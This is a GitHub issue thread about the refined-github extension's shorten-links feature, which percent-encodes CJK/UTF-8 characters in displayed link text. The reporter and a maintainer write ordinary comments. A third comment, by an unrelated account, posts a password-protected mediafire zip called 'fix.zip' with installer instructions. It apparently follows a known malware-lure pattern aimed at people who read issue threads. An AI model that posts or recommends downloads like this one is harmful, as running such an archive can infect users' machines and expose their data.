### ISSUE TITLE
`shorten-links` encodes/mangles CJK/UTF-8 characters 

### ISSUE THREAD

**Issue by scarf005** [refined-github/refined-github#7744]
### Description

| expected | actual |
| - | - |
| ![image](https://github.com/user-attachments/assets/156b412d-b582-4d65-bfc6-aca868ad803d) | ![image](https://github.com/user-attachments/assets/fc86a450-610d-4f85-a02e-329e47eaa206) | 

When shorten-links is enabled, UTF-8 characters in URL is encoded and thus unable to read.
I'm okay with `actual URL` being encoded in `[preview text](actual URL)`, but `preview text` needs to be decoded in order to be readable.

I'm willing to submit a PR.

### How to replicate the issue + URL

reproduction URL (nonexistent): https://example.site/한글로-된-URL

1. enable `shorten-links`
2. write any URL containing CJK (utf-8) letters, e.g `https://example.site/한글로-된-URL`
3. check the link after submitting or in preview.
4. the URL is encoded like `example.site/%ED%95%9C%EA%B8%80%EB%A1%9C-%EB%90%9C-URL`, making it not possible to read.

### Extension version

24.8.20

### Browser(s) used

Firefox developer edition 130.0b8

### Token ⚠️

- [X] I set a token in the options page. I understand that some features require a token to work.

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by fregante** [comment]
Thanks for the report! This bug is likely in https://github.com/refined-github/shorten-repo-url
